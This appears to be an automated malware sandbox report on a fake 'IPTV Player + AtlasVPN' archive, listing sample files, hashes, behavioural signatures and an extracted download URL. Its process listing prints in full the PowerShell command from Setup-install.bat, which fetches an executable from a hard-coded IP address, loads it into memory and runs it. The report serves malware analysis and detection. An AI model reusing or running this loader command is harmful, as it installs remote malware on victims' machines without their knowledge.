Overview
overview
10Static
static
1IPTVPlayer...PN.rar
windows7-x64
1IPTVPlayer...PN.rar
windows10-2004-x64
1Description.txt
windows7-x64
1Description.txt
windows10-2004-x64
1Setup.rar
windows7-x64
1Setup.rar
windows10-2004-x64
1Setup/Clie...NU.txt
windows7-x64
1Setup/Clie...NU.txt
windows10-2004-x64
1Setup/DAC/...rk.txt
windows7-x64
1Setup/DAC/...rk.txt
windows10-2004-x64
1Setup/DAC/...Fx.txt
windows7-x64
1Setup/DAC/...Fx.txt
windows10-2004-x64
1Setup/Lice...NU.txt
windows7-x64
1Setup/Lice...NU.txt
windows10-2004-x64
1Setup/Setu...ll.bat
windows7-x64
10Setup/Setu...ll.bat
windows10-2004-x64
10Analysis
-
max time kernel
92s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-01-2025 00:59
Static task
static1
Behavioral task
behavioral1
Sample
IPTVPlayerTOP+AtlasVPN.rar
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
IPTVPlayerTOP+AtlasVPN.rar
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Description.txt
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Description.txt
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Setup.rar
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
Setup.rar
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Setup/Client SDK/ODBC/170/License Terms/License_msodbcsql_ENU.txt
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Setup/Client SDK/ODBC/170/License Terms/License_msodbcsql_ENU.txt
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Setup/DAC/bin/Redist_DACFramework.txt
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Setup/DAC/bin/Redist_DACFramework.txt
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
Setup/DAC/bin/en/License_DACFx.txt
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
Setup/DAC/bin/en/License_DACFx.txt
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
Setup/License Terms/License_SQLNCLI_ENU.txt
Resource
win7-20240729-en
Behavioral task
behavioral14
Sample
Setup/License Terms/License_SQLNCLI_ENU.txt
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
Setup/Setup-install.bat
Resource
win7-20240903-en
General
-
Target
Setup/Setup-install.bat
-
Size
10KB
-
MD5
13a2664aae1f59fe0dc94ff8fb4dfa06
-
SHA1
a783e4b0513e16b06fa7872e454860642148957e
-
SHA256
7b9db02ad489193d1b9a5d7d7edc41a69cbc69d5e15d8267c2bf52a25dd434f3
-
SHA512
082265517a550bb06f513ddc807536de67a0c8e6531897f4b27d2772bdcbd8307541d83e4d44c9c54beb86d326367716df3dffd29d3ba35077d6afc11477ebbc
-
SSDEEP
48:syolccKcrr30cFmyPYlyhhcKKIcKKWjJcKz3EcKcKcKfJiPhcK6cKEl559HccG5p:oXtCZuMdpf4a
Malware Config
Extracted
http://147.45.44.131/infopage/rwtvha.exe
http://147.45.44.131/infopage/rwtvha.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2776 powershell.exe -
Downloads MZ/PE file
-
pid Process 2776 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2776 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2228 wrote to memory of 2776 2228 cmd.exe 31 PID 2228 wrote to memory of 2776 2228 cmd.exe 31 PID 2228 wrote to memory of 2776 2228 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Setup\Setup-install.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$url = 'http://147.45.44.131/infopage/rwtvha.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776
-